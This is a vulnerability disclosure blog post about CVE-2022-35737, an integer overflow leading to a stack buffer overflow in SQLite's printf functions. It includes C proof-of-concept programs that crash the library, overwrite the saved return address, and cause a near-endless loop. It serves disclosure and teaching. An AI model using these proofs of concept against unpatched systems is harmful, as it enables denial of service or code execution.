https://blog.trailofbits.com/2022/10/25/sqlite-vulnerability-july-2022-library-api/

Trail of Bits Blog

Menu

Skip to content

  * Home

Stranger Strings: An exploitable flaw in SQLite

  * Post
  * October 25, 2022
  * Leave a comment

By Andreas Kellas

Trail of Bits is publicly disclosing CVE-2022-35737, which affects
applications that use the SQLite library API. CVE-2022-35737 was
introduced in SQLite version 1.0.12 (released on October 17, 2000)
and fixed in release 3.39.2 (released on July 21, 2022).
CVE-2022-35737 is exploitable on 64-bit systems, and exploitability
depends on how the program is compiled; arbitrary code execution is
confirmed when the library is compiled without stack canaries, but
unconfirmed when stack canaries are present, and denial-of-service is
confirmed in all cases.

On vulnerable systems, CVE-2022-35737 is exploitable when large
string inputs are passed to the SQLite implementations of the printf
functions and when the format string contains the %Q, %q, or %w
format substitution types. This is enough to cause the program to
crash. We also show that if the format string contains the ! special
character to enable unicode character scanning, then it is possible
to achieve arbitrary code execution in the worst case, or to cause
the program to hang and loop (nearly) indefinitely.

SQLite is used in nearly everything, from naval warships to
smartphones to other programming languages. The open-source database
engine has a long history of being very secure: many CVEs that are
initially pinned to SQLite actually don't impact it at all. This blog
post describes the vulnerability and our proof-of-concept exploits,
which actually does impact certain versions of SQLite. Although this
bug may be difficult to reach in deployed applications, it is a prime
example of a vulnerability that is made easier to exploit by
"divergent representations" that result from applying compiler
optimizations to undefined behavior. In an upcoming blog post, we
will show how to find instances of the divergent representations bug
in binaries and source code.

Background: Stumbling onto a bug

A recent blog post presented a vulnerability in PHP that seemed like
the perfect candidate for a variant analysis. The blog's bug
manifested when a 64-bit unsigned integer string length was
implicitly converted into a 32-bit signed integer when passed as an
argument to a function. We formulated a variant analysis for this bug
class, found a few bugs, and while most of them were banal, one in
particular stood out: a function used for properly escaping quote
characters in the PHP PDO SQLite module. And thus began our strange
journey into SQLite string formatting.

SQLite is the most widely deployed database engine, thanks in part to
its very permissive licensing and cross-platform, portable design. It
is written in C, and can be compiled into a standalone application or
a library that exposes APIs for application programmers to use. It
seems to be used everywhere--a perception that was reinforced when we
tripped right over this vulnerability while hunting for bugs
elsewhere.

 static zend_string* sqlite_handle_quoter(pdo_dbh_t *dbh, const zend_string *unquoted, enum pdo_param_type paramtype)
 {
                char *quoted = safe_emalloc(2, ZSTR_LEN(unquoted), 3);
                /* TODO use %Q format? */
                sqlite3_snprintf(2*ZSTR_LEN(unquoted) + 3, quoted, "'%q'", ZSTR_VAL(unquoted));
                zend_string *quoted_str = zend_string_init(quoted, strlen(quoted), 0);
                efree(quoted);
                return quoted_str;
 }

On line 231, an unsigned long (2*ZSTR_LEN(unquoted) + 3) is passed as
the first parameter to sqlite3_snprintf, which expects a signed
integer. This felt exciting, and we quickly scripted a simple proof
of concept. We expected to be able to exploit this bug to produce a
poorly formatted string with mismatched quote characters by passing
large strings to the function, and possibly achieve SQL injection in
vulnerable applications.
Imagine our surprise when our proof of concept crashed the PHP
interpreter:

[php][php]

There's a bug in my bug!

We quickly determined that the crash was occurring in the SQLite
shared object, so we naturally took a closer look at the
sqlite3_snprintf function.

SQLite implements custom versions of the printf family of functions
and adds the new format specifiers %Q, %q, and %w, which are designed
to properly escape quote characters in the input string in order to
make safe SQL queries. For example, we wrote the following code
snippet to properly use sqlite3_snprintf with the format specifier %q
to output a string where all single-quote characters are escaped with
another single quote. Additionally, the entire string is wrapped in a
leading and trailing single quote, the way the PHP quote function
intends:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sqlite3.h>

int main(int argc, char *argv[]) {

    char src[] = "hello, \'world\'!";
    char dst[sizeof(src) + 4];  // Add 4 to account for extra quotes.

    sqlite3_snprintf(sizeof(dst), dst, "'%q'", src);

    printf("src: %s\n", src);
    printf("dst: %s\n", dst);
    return 0;
}

[JFlSpPEseXvmCQRGPnEdZv2Zkv3pSw1Pi38WgjmChwunr88oF5oSKWvseCrv8ke_ghwTTqZ3OV_I_uULb9kFumFmvOp6Jj0MT]
[JFlSpPEseXvmCQRGPnEdZv2Zkv3pSw1Pi38WgjmChwunr88oF5oSKWvseCrv8ke_ghwTTqZ3OV_I_uULb9kFumFmvOp6Jj0MT]

sqlite3_snprintf properly wraps the original string in single quotes,
and escapes any existing single-quotes in the input string.

Next, we changed our program to imitate the behavior of the PHP
script by passing the same large 2GB string directly to
sqlite3_snprintf:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sqlite3.h>

#define STR_LEN ((0x100000001 - 3) / 2)

int main(int argc, char *argv[]) {

    char *src = calloc(1, STR_LEN + 1); // Account for NULL byte.
    memset(src, 'a', STR_SIZE);
    char *dst = calloc(1, STR_LEN + 3); // Account for extra quotes and NULL byte.

    sqlite3_snprintf(2*STR_LEN + 3, dst, "'%q'", src);

    printf("src: %s\n", src);
    printf("dst: %s\n", dst);
    return 0;
}

[fish-][fish-]

A crash! We seem to have found a culprit: large inputs to
sqlite3_snprintf. Thus began a journey down a rabbit hole where we
discovered that SQLite does not properly handle large strings in
parts of its custom implementations of the printf family of
functions. Even further down the rabbit hole, we discovered that a
compiler optimization made it easier to exploit the SQLite
vulnerability.

The Vulnerability

The custom SQLite printf family of functions internally calls the
function sqlite3_str_vappendf, which handles string formatting. Large
string inputs to the sqlite3_str_vappendf function can cause signed
integer overflow when the format substitution type is %q, %Q, or %w.

sqlite3_str_vappendf scans the input fmt string and formats the
variable-sized argument list according to the format substitution
types specified in the fmt string. In the case statement for handling
the %q, %Q, and %w format specifiers (src/printf.c:L803-850), the
function scans the input string for quote characters in order to
calculate the correct number of output bytes (lines 824-828) and then
copies the input to the output buffer and adds quotation characters
as required (lines 842-845). In the snippet below, escarg points to
the input string:


case etSQLESCAPE:           /* %q: Escape ' characters */
case etSQLESCAPE2:          /* %Q: Escape ' and enclose in '...' */
case etSQLESCAPE3: {        /* %w: Escape " characters */
  int i, j, k, n, isnull;
  int needQuote;
  char ch;
  char q = ((xtype==etSQLESCAPE3)?'"':'\'');   /* Quote character */
  char *escarg;

  if( bArgList ){
    escarg = getTextArg(pArgList);
  }else{
    escarg = va_arg(ap,char*);
  }
  isnull = escarg==0;
  if( isnull ) escarg = (xtype==etSQLESCAPE2 ? "NULL" : "(NULL)");
  /* For %q, %Q, and %w, the precision is the number of bytes (or
  ** characters if the ! flags is present) to use from the input.
  ** Because of the extra quoting characters inserted, the number
  ** of output characters may be larger than the precision.
  */
  k = precision;
  for(i=n=0; k!=0 && (ch=escarg[i])!=0; i++, k--){
    if( ch==q )  n++;
    if( flag_altform2 && (ch&0xc0)==0xc0 ){
      while( (escarg[i+1]&0xc0)==0x80 ){ i++; }
    }
  }
  needQuote = !isnull && xtype==etSQLESCAPE2;
  n += i + 3;
  if( n>etBUFSIZE ){
    bufpt = zExtra = printfTempBuf(pAccum, n);
    if( bufpt==0 ) return;
  }else{
    bufpt = buf;
  }
  j = 0;
  if( needQuote ) bufpt[j++] = q;
  k = i;
  for(i=0; i<k; i++){
    bufpt[j++] = ch = escarg[i];
    if( ch==q ) bufpt[j++] = ch;
  }
  if( needQuote ) bufpt[j++] = q;
  bufpt[j] = 0;
  length = j;
  goto adjust_width_for_utf8;
}

The number of quote characters (int n) and the total number of bytes
in the input string (int i) are used to calculate the maximum total
bytes required in the output buffer (L832: n+=i+3). This calculation
can cause n to overflow to a negative value, for example, when the
int type is 32-bits and n=0 and i=0x7ffffffe. This is possible when
the input string contains 0x7ffffffe ASCII characters with no quote
characters.

Lines 833-838 are supposed to ensure that a buffer of sufficient size
is allocated to receive the formatted bytes of the input string. If
the output string size could exceed etBUFSIZE bytes (70 bytes, by
default), the program dynamically allocates a buffer of sufficient
size to hold the output string (line 834). Otherwise, the program
expects the output buffer to be smaller than the stack-allocated
buffer of etBUFSIZE bytes, and the small stack-allocated buffer is
used instead (line 837). At least i bytes are copied from the input
into the destination buffer. When n overflows to a negative value,
the stack-allocated buffer is used, even though i can exceed
etBUFSIZE, resulting in a stack buffer overflow when the input string
is copied to the output buffer (line 843).

The Exploits

But can we do more interesting things with this vulnerability than
just crash the target program? Of course!

The input string must be very large to reach the bug condition where
n overflows to a negative value at line 832. The challenge is that
when the input string is very large, the variable i (which counts the
number of bytes in the input string) is also very large, resulting in
a lot of data written to the stack and causing the program to crash
at line 843. We set out to determine whether it is possible to cause
n to overflow on line 832, but to also cause i to stay small and
positive at line 843 and thus avoid crashing. We revisit the loop
where i is computed, from lines 824 to 830:

/* For %q, %Q, and %w, the precision is the number of bytes (or
** characters if the ! flags is present) to use from the input.
** Because of the extra quoting characters inserted, the number
** of output characters may be larger than the precision.
*/
k = precision;
for(i=n=0; k!=0 && (ch=escarg[i])!=0; i++, k--){
  if( ch==q )  n++;
  if( flag_altform2 && (ch&0xc0)==0xc0 ){
    while( (escarg[i+1]&0xc0)==0x80 ){ i++; }
  }
}

The purpose of this loop is to scan the input string (escarg) for
quote characters (q), incrementing n each time one is found. If our
goal is to cause a controlled stack buffer overflow that does not
crash the program, then the loop must terminate with values such that
n+=i+3 results in a value less than etBUFSIZE (a macro defined to 70)
and i must be a relatively small positive integer that is greater
than etBUFSIZE.

The k and flag_altform2 variables in the loop are related to two
features of the SQLite printf functions: optional precision and the
optional alternate format flag 2, which are both influenced by the
format string. In the example below, including ! in the format string
sets flag_altform2=true, and the .80 sets precision=80:

   snprintf3_snprintf(len, buf, "'%!.80q'", src)

When precision is not set in the format string, it is set by default
to -1. Therefore, by default int k=-1, and the loop decrements k with
each iteration, so the outer loop can execute 2^32 times before k=0.

So far in our analysis of CVE-2022-35737, we've made few assumptions
about the format string passed to the vulnerable function, other than
that it contains one of the vulnerable format specifiers (%Q, %q, or
%w). To progress further in our exploitation, we need to make one
more assumption: that the flag_altform2 is set by providing a !
character in the format string.

When flag_altform2=true, it is possible to increment i in the inner
loop without decrementing k by including unicode characters in the
input string. With this in mind, perhaps we can include enough quote
characters in the input to set n to a large positive integer, and
then cause i to increment in the inner loop until it wraps back
around to a small positive integer, and then somehow exit the loop.
But how will i behave when it overflows beyond the maximum signed
integer value? Will it wrap back to 0, or to a negative value? Is it
possible to tell by just looking at the source code? No, it isn't;
this is undefined behavior, so we must inspect the compiled binary to
see what choices the compiler made to represent i.

Divergent Representations in the compiled binary

We have been working on an Ubuntu 20.04 host and have a version of
libsqlite.so version 3.31.1 installed from the APT package manager,
so that is the version of the compiled binary that we examine in
Binary Ninja:

[binary_ninja_101822][binary_ninja_101822]

Binary Ninja disassembly of the compiled loop from source code lines
824 to 830, where the escarg input string is scanned for
quote-characters. [1a] and [1b] indicate source line 825 escarg[i]; ...
i++. [2a] and [2b] indicate source line 828 escarg[i+1]; ... i++.

At instruction [1a], r10 contains the address of escarg, and rsi is
used to index into the buffer to fetch a value from it, where the rsi
register was set by sign-extending the 32-bit edx register in the
instruction immediately before it. This corresponds to the escarg[i]
expression on line 825 of the source code. With each loop iteration,
edx is incremented at instruction [1b]. This means that the source
code variable i is represented using signed 32-bit integer semantics,
and so when i reaches the maximum 32-bit positive signed integer
value (0x7fffffff), it will increment to 0x80000000 at [1b], which
will be sign-extended into rsi as 0xffffffff80000000 and used to
negatively index into escarg.

However, instruction [2a] tells a different story. Here, r10 still
contains the address of escarg, but rax+1 is used to index into the
buffer, corresponding to the escarg[i+1] expression on line 828 of
the source code, in the inner loop that scans for unicode characters.
Instruction [2b] increments rax, but as a 64-bit value--and with no
32-bit sign-extension--before looping back to [2a]. Here, i is
represented with unsigned 64-bit integer semantics, so that when i
exceeds the maximum signed 32-bit integer value (0x7fffffff), its
next memory access is to escarg+0x80000000. We have divergent
representations of the same source variable, and two different values
can be read from memory for the same value of the source variable i!
This discovery prompted us to search for more instances of these
"divergent representations," and we describe this search in a
forthcoming blog post.

Okay, so can we use this compilation quirk to set the conditions for
a more interesting exploit of CVE-2022-35737? Turns out, yes.

Controlling the Saved Return Address

Here's a quick recap of the conditions that we are trying to set:


case etSQLESCAPE:           /* %q: Escape ' characters */
case etSQLESCAPE2:          /* %Q: Escape ' and enclose in '...' */
case etSQLESCAPE3: {        /* %w: Escape " characters */
  int i, j, k, n, isnull;
  int needQuote;
  char ch;
  char q = ((xtype==etSQLESCAPE3)?'"':'\'');   /* Quote character */
  char *escarg;

  if( bArgList ){
    escarg = getTextArg(pArgList);
  }else{
    escarg = va_arg(ap,char*);
  }
  isnull = escarg==0;
  if( isnull ) escarg = (xtype==etSQLESCAPE2 ? "NULL" : "(NULL)");
  /* For %q, %Q, and %w, the precision is the number of bytes (or
  ** characters if the ! flags is present) to use from the input.
  ** Because of the extra quoting characters inserted, the number
  ** of output characters may be larger than the precision.
  */
  k = precision;
  for(i=n=0; k!=0 && (ch=escarg[i])!=0; i++, k--){
    if( ch==q )  n++;
    if( flag_altform2 && (ch&0xc0)==0xc0 ){
      while( (escarg[i+1]&0xc0)==0x80 ){ i++; }
    }
  }
  needQuote = !isnull && xtype==etSQLESCAPE2;
  n += i + 3;
  if( n>etBUFSIZE ){
    bufpt = zExtra = printfTempBuf(pAccum, n);
    if( bufpt==0 ) return;
  }else{
    bufpt = buf;
  }
  j = 0;
  if( needQuote ) bufpt[j++] = q;
  k = i;
  for(i=0; i<k; i++){
    bufpt[j++] = ch = escarg[i];
    if( ch==q ) bufpt[j++] = ch;
  }
  if( needQuote ) bufpt[j++] = q;
  bufpt[j] = 0;
  length = j;
  goto adjust_width_for_utf8;
}

Here is a screenshot to highlight what we want to concentrate on:

[Screen-Shot-2022-10-18-at-5][Screen-Shot-2022-10-18-at-5]

We want the loop at [1] to terminate with values of i and n set so
that the calculation at [2] overflows, resulting in a value of n that
is negative or less than etBUFSIZE (70) and i set to a relatively
small positive integer value that is greater than etBUFSIZE. This
would allow the loop at [3] to write beyond the bounds of the
stack-allocated bufpt, but without causing the program to crash
immediately by writing beyond the stack memory region.

Consider the string input that contains 0x7fffff00 single-quote (')
characters, followed by a single 0xc0 byte (a unicode prefix) and
then by enough 0x80 bytes to bring the total string length to
0x100000100 bytes (followed by a NULL byte). Let's call this string
string1, and think about what happens when this string is passed to
sqlite3_snprintf:

snprintf3_snprintf(len, buf, "'%!q'", string1)

(Notice that we've changed the format string to allow unicode
characters by providing the ! character.)

When the loop at [1] scans the first 0x7fffff00 bytes of string1, n
and i both increment to 0x7fffff00. On the next loop iteration, the
program reads the unicode character prefix from the input string and
enters the inner loop, where i is represented with 64-bit unsigned
semantics. The i variable increments to 0x100000100 before a NULL
byte is encountered, causing the inner loop to terminate. At this
point in program execution, n=0x7fffff00 and, when downcast to a
32-bit value, i=0x100. If the loop at [1] terminated at this point,
the computation n+=i+3 would result in n=0x80000003, which is
negative when treated as a signed value. Meanwhile, i is now a small
positive integer but is greater than 70 (etBUFSIZE), which would
result in a stack buffer overflow when 256 (0x100) bytes are read
into a stack buffer of 70 bytes. This shows progress towards our
goal: An extra couple of hundred bytes written to the stack are
unlikely to reach the end of the stack memory region, but they are
likely to reach interesting data saved on the stack, like saved
return addresses and stack canaries. We can determine the exact
position of this data on the stack by inspecting the target binary,
and then adjust the input string size to control how much data is
overwritten to the stack buffer.

Unfortunately, this approach will not work as-is, because the loop at
[1] does not terminate at the point described above. Because of the
divergent representations of the i variable, escarg[i+1] at line 828
(inner loop) will represent i as 0x100000100 and read a NULL byte at
the end of our large string, but escarg[i] at line 825 (outer loop)
will represent i as 0x100 and instead read a single-quote character
(') from near the beginning of the input string. As a result, the
loop exit condition is not met and the loop continues, with i=0x100
and n=0x7fffff00. Notably, by this point k has decremented 0x7fffff00
times. Because there is no NULL byte in the input string in the first
231 bytes, escarg[i] will never read a NULL byte at line 825, and we
have to instead depend on k decrementing to 0 in order to exit the
loop at [1]. We can accomplish this by allowing the outer loop to
continue incrementing until k has decremented all the way to 0, but
with specially calculated values for n and i.

With this thought in mind, we can take the same approach described
above, which is to increment n to a very large positive value by
supplying single-quote characters in the input string, and to then
set i to a small positive value by supplying unicode characters to
increment i using 64-bit unsigned semantics. We calculate our values
by accounting for the fact that the outer loop will increment 2^32
times because k needs to decrement from 0xffffffff to 0.

Our proof of concept uses this insight to control the number of bytes
that overflow the stack-allocated buffer and overwrite the saved
return address and stack canary:

#include <assert.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sqlite3.h>

// Offsets relative to sqlite3_str_vappendf stack frame base. Calculated using
// the version of libsqlite3.so.0.8.6 provided by apt on Ubuntu 20.04.
#define RETADDR_OFFSET  0
#define CANARY_OFFSET   0x40
#define BUF_OFFSET      0x88
#define CANARY          0xbaadd00dbaadd00dull
#define ROPGADGET       0xdeadbeefdeadbeefull
#define NGADGETS        1

struct payload {
    uint8_t padding1[BUF_OFFSET-CANARY_OFFSET];
    uint64_t canary;
    uint8_t padding2[CANARY_OFFSET-RETADDR_OFFSET-8];
    uint64_t ropchain[NGADGETS];
}__attribute__((packed, aligned(1)));

int main(int argc, char *argv[]) {
    char dst[256];
    struct payload p;
    memset(p.padding1, 'a', sizeof(p.padding1));
    p.canary = CANARY;
    memset(p.padding2, 'b', sizeof(p.padding2));
    p.ropchain[0] = ROPGADGET;

    size_t target_n = 0x80000000;
    assert(sizeof(p) + 3 <= target_n);
    size_t n = target_n - sizeof(p) - 3;
    size_t target_i = 0x100000000 + (sizeof(p) / 2);

    char *src = calloc(1, target_i);
      if (!src) { printf("bad allocation\n"); return -1; }

    size_t cur = 0;
    memcpy(src, &p, sizeof(p));
    cur += sizeof(p);
    memset(src+cur, '\'', n/2);
    cur += n/2;
    assert(cur < 0x7ffffffeul);
    memset(src+cur, 'c', 0x7ffffffeul-cur);
    cur += 0x7ffffffeul-cur;
    src[cur] = '\xc0';
    cur++;
    memset(src+cur, '\x80', target_i - cur);
    cur = target_i;
    src[cur-1] = '\0';

    sqlite3_snprintf((int) 256, dst, "'%!q'", src);
    free(src);
    return 0;
}

[fish-][fish-]

This proof of concept causes the program to crash, but with a SIGABRT
rather than a SIGSEGV. This implies that a stack canary was
overwritten and that the vulnerable function tried to return. This is
in contrast to the earlier crashing proof of concept that crashed
before reaching the function return.

To confirm that we have successfully controlled the saved return
address and stack canary, we can use GDB to view the stack frame
before the vulnerable function returns:

[Screen-Shot-2022-10-18-at-6][Screen-Shot-2022-10-18-at-6]

Executing the proof of concept in a debugger shows that the saved
return address is set to 0xdeadbeefdeadbeef.

Note that in a non-contrived scenario, a real stack canary will
contain a NULL byte, which would defeat the proof of concept above
because the NULL byte will cause the string-scanning loop to
terminate before the entire payload is copied over the return
address. Clever exploitation techniques or specific format string
conditions may allow an attacker to bypass this, but our intention is
to show that the saved return address can be overwritten.

Looping (Nearly) Forever

We took our exploitation one step further and developed a proof of
concept that uses the divergent representations of the i variable to
cause loop [1] to iterate nearly infinitely by incrementing i 2^64
times, which effectively takes forever. This is achieved by causing
the inner loop to increment i 2^32 times on every iteration of loop
[1], which will also increment 2^32 times. The interesting part of
this proof of concept is that it doesn't actually reach the
vulnerable integer overflow computation on line 832, but uses only
the undefined behavior that results from allowing string inputs
larger than what can be represented with 32-bit integers. All that is
required is to fill a buffer of 0x100000000 bytes with unicode prefix
characters (a single byte of 0xc0 followed by bytes of 0x80), and the
loop at [1] will never terminate:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sqlite3.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    size_t src_buf_size = 0x100000001;

    char *src = calloc(1, src_buf_size);
      if (!src) {
        printf("bad allocation\n");
        return -1;
    }
    src[0] = '\xc0';
    memset(src+1, '\x80',  0xffffffff);

    char dst[256];
    sqlite3_snprintf(256, dst, "'%!q'", src);
    free(src);
    return 0;
}

We showed that CVE-2022-35737 is exploitable when large string inputs
are passed to the SQLite implementations of the printf functions and
when the format string contains the %Q, %q, or %w format substitution
types. This is enough to cause the program to crash. We also showed
that if the format string additionally allows for unicode characters
by providing the ! character, then it is possible to overwrite the
saved return address and to cause the program to loop (nearly)
infinitely.

But, SQLite is well-tested, right?

SQLite is extensively tested with 100% branch test coverage. We
discovered this vulnerability despite the tests, which raises the
question: how did the tests miss it?

SQLite maintains an internal memory limit of 1GB, so the
vulnerability is not reachable in the SQLite program. The problem is
"defined away" by the notion that SQLite does not support big strings
necessary to trigger this vulnerability.

However, the C APIs provided by SQLite do not enforce that their
inputs adhere to the memory limit, and applications are able to call
the vulnerable functions directly. The notion that large strings are
unsupported by SQLite is not communicated with the API, so
application developers cannot know how to enforce input size limits
on these functions. When this code was first written, most processors
had 32-bit registers and 4GB of addressable memory, so allocating 1GB
strings as input was impractical. Now that 64-bit processors are
quite common, allocating such large strings is feasible and the
vulnerable conditions are reachable.

Unfortunately, this vulnerability is an example of one where
extensive branch test coverage does not help, because no new code
paths are introduced. 100% branch coverage says that every line of
code has been executed, but not how many times. This vulnerability is
the result of invalid data that causes code to execute billions of
times more than it should.

The thoroughness of SQLite's tests is remarkable -- the discovery of
this vulnerability should not be taken as a knock on the robustness
of the tests. In fact, we wish more projects put as much emphasis on
testing as SQLite does. Nonetheless, this bug is evidence that even
the best-tested software can have exploitable bugs.

Conclusion

Not every system or application that uses the SQLite printf functions
is vulnerable. For those that are, CVE-2022-35737 is a critical
vulnerability that can allow attackers to crash or control programs.
The bug has been particularly interesting to analyze, for a few
reasons. For one, the inputs required to reach the bug condition are
very large, which makes it difficult for traditional fuzzers to
reach, and so techniques like static and manual analysis were
required to find it. For another, it's a bug that may not have seemed
like an error at the time that it was written (dating back to 2000 in
the SQLite source code) when systems were primarily 32-bit
architectures. And--most interestingly to us at Trail of Bits--its
exploitation was made easier by the discovered "divergent
representations" of the same source variable, which we explore
further in a separate blog post.

I'd like to thank my mentor, Peter Goodman, for his expert guidance
throughout my summer internship with Trail of Bits. I'd also like to
thank Nick Selby for his help in navigating the responsible
disclosure process, and all members of the Trail of Bits team who
assisted in advising and writing this blog post.

Coordinated disclosure

July 14, 2022: Reported vulnerability to the Computer Emergency
Response Team (CERT) Coordination Center.
July 15, 2022: CERT/CC reported vulnerability to SQLite maintainers.
July 18, 2022: SQLite maintainers confirmed the vulnerability and
fixed it in source code.
July 21, 2022: SQLite maintainers released SQLite version 3.39.2 with
fix.

We would like to thank the teams at SQLite and CERT/CC for working
swiftly with us to address these issues.

Share this:

  * Twitter
  * LinkedIn
  * Reddit
  * Telegram
  * Facebook
  * Pocket
  * Email
  * Print
  * 

Like this:

Like Loading...

By Trail of Bits

Posted in Attacks, Internship Projects

Post navigation

- We do Windows now

Leave a Reply Cancel reply

Search [                    ] [Search]
About Us

Since 2012, Trail of Bits has helped secure some of the world's most
targeted organizations and products. We combine high-end security
research with a real world attacker mentality to reduce risk and
fortify code.

Read more at www.trailofbits.com

Subscribe via RSS

RSS feed RSS - Posts

Recent Posts

  * Stranger Strings: An exploitable flaw in SQLite
  * We do Windows now
  * Porting the Solana eBPF JIT compiler to ARM64
  * Working on blockchains as a Trail of Bits intern
  * Secure your machine learning with Semgrep
  * It pays to be Circomspect
  * Magnifier: An Experiment with Interactive Decompilation
  * Using mutants to improve Slither
  * The road to the apprenticeship
  * Shedding smart contract storage with Slither
  * libmagic: The Blathering
  * A Typical Day as a Trail of Bits Engineer-Consultant
  * The Trail of Bits Hiring Process
  * Managing risk in blockchain deployments
  * Are blockchains decentralized?

Yearly Archive

  * 2020
  * 2019
  * 2018
  * 2017
  * 2016
  * 2015
  * 2014
  * 2013
  * 2012

Categories

  * Apple (13)
  * Attacks (10)
  * Audits (1)
  * Authentication (5)
  * Binary Ninja (12)
  * Blockchain (50)
  * Capture the Flag (11)
  * Careers (2)
  * CodeQL (2)
  * Compilers (23)
  * Conferences (28)
  * Containers (2)
  * Cryptography (39)
  * Crytic (3)
  * Cyber Grand Challenge (7)
  * DARPA (21)
  * Dynamic Analysis (12)
  * Education (14)
  * Empire Hacking (7)
  * Engineering Practice (12)
  * Events (5)
  * Exploits (27)
  * Fuzzing (29)
  * Go (4)
  * Guides (9)
  * Internship Projects (30)
  * iVerify (4)
  * Kubernetes (2)
  * Linux (1)
  * Machine Learning (6)
  * Malware (7)
  * Manticore (15)
  * McSema (11)
  * Meta (12)
  * Mitigations (9)
  * osquery (22)
  * Paper Review (11)
  * People (1)
  * Podcast (1)
  * Press Release (26)
  * Privacy (9)
  * Products (5)
  * Program Analysis (16)
  * Recruitment (1)
  * Remote Work (1)
  * Research Practice (18)
  * Reversing (14)
  * Rust (4)
  * SafeDocs (1)
  * Sinter (1)
  * Slither (2)
  * Sponsorships (12)
  * Static Analysis (28)
  * Symbolic Execution (17)
  * Training (1)
  * Uncategorized (21)
  * Working at Trail of Bits (2)
  * Year in Review (4)
  * Zero Knowledge (8)

My Tweets
 

  

Loading Comments...
 
Write a Comment... [                    ]
Email (Required) [                    ] Name (Required)
[                    ] Website [                    ]
[Post Comment]

%d bloggers like this: